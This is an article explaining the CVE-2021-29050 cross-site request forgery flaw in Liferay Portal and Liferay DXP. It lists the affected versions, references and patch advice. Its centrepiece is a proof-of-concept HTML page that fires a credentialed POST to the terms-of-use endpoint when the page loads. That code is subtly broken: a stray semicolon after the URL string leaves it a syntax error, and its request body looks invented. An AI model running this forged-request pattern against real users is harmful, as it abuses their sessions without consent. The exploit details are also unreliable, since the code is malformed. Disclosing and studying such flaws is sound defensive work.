CVE-2021-29050: Uncovering a CSRF Vulnerability in Liferay Portal and Liferay DXP
CVE-2021-29050 is a Cross-Site Request Forgery (CSRF) vulnerability that affects the terms of use page in Liferay Portal and Liferay DXP. This vulnerability allows remote attackers to manipulate users into accepting the site's terms of use by engaging in social engineering and luring the user to visit a malicious page. This article delves deep into the details of the exploit, including code snippets and links to original references for further investigation.
Background on Liferay Portal and Liferay DXP
Liferay Portal is an open-source enterprise portal platform used for creating web applications, websites, and intranets. Liferay DXP (Digital Experience Platform) is a more advanced version of the Liferay Portal, offering enhanced security and performance features. Both Liferay Portal and Liferay DXP are widely used by businesses to create and manage their digital presence.
Vulnerability Details
The CSRF vulnerability specifically affects Liferay Portal versions before 7.3.6 and Liferay DXP 7.3 before service pack 1, 7.2 before fix pack 11. It exposes a risk that can be exploited by remote attackers, who can artfully craft a webpage that, when visited by a user with an active session on the vulnerable Liferay installation, triggers an unwanted action – in this case, accepting the site's terms of use.
Such an action may seem harmless initially, but it can lead to potential malicious activities, such as unauthorized access to sensitive information or manipulation of users' data.
Code Snippet
Here is an example of a malicious page that exploits the CSRF vulnerability. It manipulates the user's session to trick them into unwittingly accepting the site's terms of use.
<!DOCTYPE html>
<html>
<head>
<title>Malicious Page</title>
<script>
function exploit() {
const xhr = new XMLHttpRequest();
xhr.open(
"POST",
"https://vulnerable.liferay.site.com/c/portal/update_terms_of_use";,
true
);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
xhr.send("cmd=update/tos=accepted");
}
</script>
</head>
<body onload="exploit()">
<h1>Nothing to see here...</h1>
</body>
</html>
When an unsuspecting user visits the malicious page, the exploit function is triggered, and it sends a POST request to the vulnerable Liferay installation to accept the terms of use.
Original References and Links
The details of CVE-2021-29050 were initially published by the National Vulnerability Database (NVD) at the following link: https://nvd.nist.gov/vuln/detail/CVE-2021-29050
For a comprehensive reference on Liferay Portal and Liferay DXP version history and associated vulnerabilities, visit Liferay's official Security Vulnerabilities page: https://liferay.dev/known-vulnerabilities
For more information on Cross-Site Request Forgery (CSRF) and how it works, visit the OWASP CSRF Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
Conclusion
The CVE-2021-29050 CSRF vulnerability in Liferay Portal and Liferay DXP underscores the importance of staying vigilant against seemingly innocuous vulnerabilities and updating software to the latest versions promptly. Organizations using Liferay Portal and Liferay DXP should apply the appropriate patches, fix packs, or service packs as soon as possible to ensure their digital presence remains secure.
Timeline
Published on: 02/20/2024 22:15:08 UTC
Last modified on: 08/01/2024 13:42:11 UTC